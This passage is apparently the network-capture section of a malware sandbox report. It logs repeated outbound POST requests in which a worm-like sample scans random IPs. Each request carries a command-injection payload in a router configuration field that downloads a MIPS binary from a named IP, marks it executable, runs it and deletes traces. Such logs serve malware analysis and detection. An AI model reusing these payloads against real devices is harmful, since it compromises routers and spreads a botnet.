                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3117192.168.2.2349288107.28.206.1878080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.508953094 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3118192.168.2.234936213.197.71.1538080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.508981943 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3119192.168.2.2337358187.64.83.2368080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.508984089 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3120192.168.2.2334758123.252.24.1708080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.509412050 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3121192.168.2.2354260173.135.31.1608080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.509495020 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3122192.168.2.234747225.49.221.848080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.509511948 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3123192.168.2.2347708128.79.57.1718080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.509538889 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3124192.168.2.234133035.254.17.1248080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.509560108 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3125192.168.2.2339462204.198.254.1458080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.509567976 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3126192.168.2.235585466.176.174.2548080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.509594917 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3127192.168.2.2344766199.80.104.658080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.509650946 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3128192.168.2.2357528216.28.25.1948080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.509701014 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3129192.168.2.236091062.100.225.2368080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.509744883 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3130192.168.2.2340952130.70.204.2358080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.509805918 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3131192.168.2.2357072112.17.81.2228080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.509819984 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3132192.168.2.233513294.239.137.2498080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.509876013 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3133192.168.2.234804671.48.194.1048080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.509923935 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3134192.168.2.2343002198.108.123.448080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.509949923 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3135192.168.2.233718235.246.27.1818080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.509967089 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3136192.168.2.234659220.9.92.1728080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.509984970 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3137192.168.2.23494304.133.231.458080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.510020018 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3138192.168.2.233953086.233.117.828080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.510535955 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3139192.168.2.2342904124.199.152.20737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.603995085 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
